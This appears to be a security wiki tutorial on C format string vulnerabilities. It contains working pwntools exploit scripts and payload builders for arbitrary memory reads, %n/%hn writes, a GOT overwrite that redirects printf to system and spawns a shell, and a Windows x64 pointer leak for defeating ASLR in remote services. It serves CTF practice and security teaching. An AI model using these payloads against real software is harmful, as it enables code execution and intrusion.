Format Strings


Basic Information

In C, printf is a function that prints a string. The first parameter this function expects is the raw text with the formatters. The following parameters are the values that replace the formatters in the raw text.

Other vulnerable functions are sprintf() and fprintf().

The vulnerability appears when attacker-controlled text is used as the format argument of one of these functions (the first argument of printf). The attacker can craft an input that abuses the printf format string features to read and write data at any readable or writable address, which can lead to arbitrary code execution.

Formatters:

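%08x -> 8 hex digits (a 4-byte value, zero-padded)
%d -> Signed integer
%u -> Unsigned integer
%s -> String
%p -> Pointer
%n -> Writes the number of bytes printed so far to the address given by the argument
%hn -> Same as %n, but writes 2 bytes instead of 4
%<n>$x -> Direct access, Example: ("%3$d", var1, var2, var3) -> Access to var3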

Examples:

Vulnerable example:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

Normal use:

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
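
Python's printf-style % operator follows the same rules for these read-only conversions, so it is a safe way to check what a specifier prints without touching memory. A minimal sketch (the helper name `show` is hypothetical; %n, %hn and positional %<n>$x are C-only and are not supported by Python):

```python
def show(fmt: str, value) -> str:
    """Format one value with a printf-style specifier using Python's % operator."""
    return fmt % (value,)

print(show("%x", 1205))     # 4b5
print(show("%08x", 1205))   # 000004b5  (zero-padded to 8 hex digits)
print(show("%d", -5))       # -5
print(show("%s", "abc"))    # abc
```

This only mirrors the output formatting; it says nothing about how a C printf fetches missing arguments.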

With missing arguments:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

Vulnerable fprintf:

#include <stdio.h>

int main(int argc, char *argv[]) {
    char *user_input;
    user_input = argv[1];
    FILE *output_file = fopen("output.txt", "w");
    fprintf(output_file, user_input); // The user input can include formatters!
    fclose(output_file);
    return 0;
}

Accessing Pointers

The format %<n>$x, where n is a number, tells printf to select the n-th parameter (from the stack). So, to read the 4th parameter from the stack using printf, you could do:

printf("%x %x %x %x")

and you would read from the first to the fourth parameter.

Or you could do:

printf("%4$x")

and read the fourth one directly.

Note that the attacker controls the printf format argument, so the input itself is on the stack when printf is called. This means the attacker can place specific memory addresses on the stack.

Caution

An attacker controlling this input can add arbitrary addresses to the stack and make printf access them. The next section explains how to use this behavior.

Arbitrary Read

The formatter %n$s makes printf take the address located at position n, follow it, and print the memory there as if it were a string (printing until a 0x00 byte is found). So, if the base address of the binary is 0x8048000 and we know the user input starts at the 4th position on the stack, the start of the binary can be printed with:

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

Caution

Note that you cannot put the address 0x8048000 at the beginning of the input: the address contains a 0x00 byte, and printf stops processing the format string at the first null byte, so everything after it would be ignored.
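
The layout used above (specifier first, padding, address last) can be sketched with the standard library alone. This is a minimal sketch for a 32-bit little-endian target; the helper name `build_read_payload` and the `fmt_area` parameter are hypothetical, and the stack position of the input is assumed to be already known:

```python
import struct

def build_read_payload(addr: int, input_offset: int, fmt_area: int = 8) -> bytes:
    """Build '%N$s' + padding + 32-bit little-endian address.

    input_offset: stack position where our input starts (assumed known).
    fmt_area:     bytes reserved for the specifier, a multiple of 4.
    """
    if fmt_area % 4:
        raise ValueError("fmt_area must be a multiple of 4")
    index = input_offset + fmt_area // 4      # position of the address word
    spec = f"%{index}$s".encode()
    if len(spec) > fmt_area:
        raise ValueError("specifier does not fit in fmt_area")
    return spec.ljust(fmt_area, b"x") + struct.pack("<I", addr)

payload = build_read_payload(0x8048000, input_offset=4)
print(payload)                   # b'%6$sxxxx\x00\x80\x04\x08'
print(payload.index(b"\x00"))    # 8: the null byte comes after the specifier
```

Because the address sits at the end, the null byte only terminates the string after printf has already parsed the %6$s specifier.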

Find the offset

To find the offset to your input, send 4 or 8 bytes (0x41414141) followed by %1$x and increase the number until the A's are retrieved.
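
A variation on the same idea sends several positional specifiers in one request and parses the reply offline. The sketch below only builds the probe and parses a reply; the helper names are hypothetical and the sample reply is made up for illustration, not captured from a real target:

```python
def build_probe(count: int, marker: bytes = b"AAAA") -> bytes:
    """Marker followed by '|%1$x|%2$x|...' so each slot can be told apart."""
    specs = "".join(f"|%{i}$x" for i in range(1, count + 1))
    return marker + specs.encode()

def find_offset(reply: bytes, marker: bytes = b"AAAA"):
    """Return the 1-based slot whose value equals the marker, or None."""
    # The marker is compared as a little-endian word (x86 assumption).
    wanted = int.from_bytes(marker, "little")
    for slot, field in enumerate(reply.split(b"|")[1:], start=1):
        try:
            if int(field.strip(), 16) == wanted:
                return slot
        except ValueError:
            continue          # skip fields that are not plain hex
    return None

print(build_probe(3))                                   # b'AAAA|%1$x|%2$x|%3$x'
sample = b"AAAA|f7fb2000|0|804a000|41414141|7c782431"   # illustrative reply
print(find_offset(sample))                              # 4
```

The separator keeps adjacent values from running together, which plain %x%x%x output does not guarantee.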

Brute Force printf offset

```python
# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over a range of integers (positional arguments start at 1)
for i in range(1, 10):
    # Construct a payload that includes the current integer as offset
    payload = f"AAAA%{i}$x".encode()

    # Start a new process of the "chall" binary
    p = process("./chall")

    # Send the payload to the process
    p.sendline(payload)

    # Read and store the output of the process
    output = p.clean()

    # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
    if b"41414141" in output:
        # If the string is found, log the success message and break out of the loop
        log.success(f"User input is at offset : {i}")
        break

    # Close the process
    p.close()
```

### How useful

Arbitrary reads can be useful to:

- **Dump** the **binary** from memory
- **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords, as in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))

## **Arbitrary Write**

The formatter **`%<num>$n`** **writes** the **number of bytes written so far** to the **address indicated** by parameter <num> on the stack. If an attacker can make printf output as many characters as desired, **`%<num>$n`** can write an arbitrary number to an arbitrary address.

Fortunately, writing the number 9999 does not require adding 9999 "A"s to the input: the formatter **`%.<num-write>d%<num>$n`** adds **`<num-write>`** characters to the count, which is then written to the **address pointed to by position `num`**.
```bash
AAAA%.6000d%4\$n -> Write 6004 to the address indicated by the 4th param
AAAA.%500\$08x -> Param at offset 500
```
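
The arithmetic behind the first line is simply "characters already printed plus padding". A minimal sketch, with a hypothetical helper name, assuming the argument consumed by %d is non-negative and prints in no more digits than the padding (a negative value would add a sign character and shift the count by one):

```python
def count_write_payload(value: int, arg_index: int, prefix: bytes = b"AAAA") -> bytes:
    """Return prefix + '%.<pad>d%<arg_index>$n' so that %n stores `value`."""
    pad = value - len(prefix)          # characters still to print before %n
    if pad < 1:
        raise ValueError("value must exceed the bytes already printed")
    return prefix + f"%.{pad}d%{arg_index}$n".encode()

print(count_write_payload(6004, 4))    # b'AAAA%.6000d%4$n'
```

In a shell the `$` must be escaped as in the lines above; when the payload is sent from a script, no escaping is needed.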

However, note that to write an address such as 0x08049724 (which is a HUGE number to write at once), $hn is usually used instead of $n. This writes only 2 bytes, so the operation is done twice: once for the highest 2 bytes of the address and once for the lowest.
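
To see why the split matters, compare how many characters printf would have to output in each case. A small worked example (the helper name `split_halves` is hypothetical):

```python
def split_halves(value: int):
    """Split a 32-bit value into its high and low 16-bit halves."""
    return (value >> 16) & 0xFFFF, value & 0xFFFF

value = 0x08049724
hob, lob = split_halves(value)
print(value)                 # 134518564 characters needed with a single $n
print(hex(hob), hex(lob))    # 0x804 0x9724
print(max(hob, lob))         # 38692 characters in total with two $hn writes
```

With two $hn writes the output never needs to exceed 65535 characters.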

Therefore, this vulnerability allows writing anything to any address (arbitrary write).

In this example, the goal is to overwrite the address of a function in the GOT table that will be called later, although other arbitrary write to exec techniques could be abused instead:

Write What Where 2 Exec

We are going to overwrite a function that receives its arguments from the user and point it to the system function.
As mentioned, writing the address usually takes 2 steps: first 2 bytes of the address are written and then the other 2. To do so, $hn is used.

HOB refers to the 2 highest bytes of the address
LOB refers to the 2 lowest bytes of the address

Then, because the count of printed characters can only grow, the smaller of [HOB, LOB] must be written first, and then the other one.

If HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn

If HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
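
The two templates above can be folded into one helper. This is a minimal sketch for a 32-bit little-endian target using only the standard library; the function name is hypothetical, and it assumes the two address words land at stack positions offset and offset+1. With the values from the command above (target 0x08049724, value 0xBFFFFC2F, offset 4) it produces the same payload:

```python
import struct

def build_hn_payload(target: int, value: int, offset: int) -> bytes:
    """Two-step $hn payload for a 32-bit little-endian target.

    target: address to overwrite; value: 32-bit value to store there;
    offset: stack position of the first address word ([address+2]).
    """
    hob, lob = (value >> 16) & 0xFFFF, value & 0xFFFF
    addrs = struct.pack("<II", target + 2, target)    # [address+2][address]
    # Write the smaller half first because the printed count only grows.
    first, second = sorted([(hob, offset), (lob, offset + 1)])
    pad1 = first[0] - len(addrs)       # 8 address bytes are already printed
    pad2 = second[0] - first[0]
    if pad1 < 8 or pad2 < 8:
        # %.Nx prints at least N digits, so tiny pads could overshoot
        raise ValueError("halves too small or too close for this simple layout")
    fmt = f"%.{pad1}x%{first[1]}$hn%.{pad2}x%{second[1]}$hn"
    return addrs + fmt.encode()

payload = build_hn_payload(0x08049724, 0xBFFFFC2F, offset=4)
print(payload)
```

The guard on small paddings is a simplification; tools such as pwntools' fmtstr_payload handle those cases with different layouts.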

Pwntools Template

You can find a template to prepare an exploit for this kind of vulnerability in:

Format Strings Template

Or this basic example from here:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline(b'/bin/sh')

p.interactive()

Format Strings to BOF

It is possible to abuse the write actions of a format string vulnerability to write to addresses on the stack and exploit a buffer overflow type of vulnerability.

Windows x64: Format-string leak to bypass ASLR (no varargs)

On Windows x64 the first four integer/pointer parameters are passed in registers: RCX, RDX, R8, R9. In many vulnerable call sites the attacker-controlled string is used as the format argument but no variadic arguments are provided, for example:

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

Because no varargs are passed, any conversion such as "%p", "%x" or "%s" makes the CRT read the next variadic argument from the corresponding register. With the Microsoft x64 calling convention, the first such read for "%p" comes from R9. Whatever transient value is in R9 at the call site gets printed. In practice this often leaks a stable in-module pointer (e.g., a pointer to a local/global object previously placed in R9 by the surrounding code, or a callee-saved value), which can be used to recover the module base and bypass ASLR.

Practical workflow:

Inject a harmless format such as "%p " at the very start of the attacker-controlled string, so the first conversion is executed before any filtering.
Capture the leaked pointer, identify the static offset of that object inside the module (by reversing once with symbols or a local copy), and recover the image base as leak - known_offset.
Reuse that base to compute absolute addresses of ROP gadgets and IAT entries remotely.

Example (abbreviated python):

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

Notes:

The exact offset to subtract is found once during local reversing and then reused (same binary/version).
If "%p" doesn't print a valid pointer on the first try, try other specifiers ("%llx", "%s") or multiple conversions ("%p %p %p") to sample other argument registers/stack.
This pattern is specific to the Windows x64 calling convention and to printf-family implementations that fetch nonexistent varargs from registers when the format string requests them.

This technique is extremely useful to bootstrap ROP on Windows services compiled with ASLR and with no obvious memory disclosure primitives.
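
The base recovery and rebasing steps can be sketched offline as follows. The helper names are hypothetical, the leak and offset are the values from the example above, and 0x1234 is a made-up RVA used only for illustration. The alignment check relies on Windows mapping images on 64 KiB boundaries:

```python
def module_base(leaked: int, known_offset: int) -> int:
    """Image base = leaked pointer - offset of that object inside the module."""
    base = leaked - known_offset
    # A misaligned result suggests the wrong offset or a pointer
    # that does not belong to the expected module.
    if base & 0xFFFF:
        raise ValueError(f"suspicious base {base:#x}: not 64 KiB aligned")
    return base

def rebase(base: int, rva: int) -> int:
    """Absolute address of a gadget or IAT entry given its RVA."""
    return base + rva

base = module_base(0x7ff6693d0660, 0x20660)
print(hex(base))                    # 0x7ff6693b0000
print(hex(rebase(base, 0x1234)))    # 0x7ff6693b1234
```

Rejecting a misaligned base early avoids building a ROP chain on top of a wrong leak.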

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string to overwrite the address of fflush with the win function (ret2win)
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32 bit, relro, no canary, nx, no pie, format string to write an address inside main into .fini_array (so the flow loops back one more time) and to write the address of system into the GOT entry of strlen. When the flow returns to main, strlen is executed with user input and, since it now points to system, it executes the passed commands.
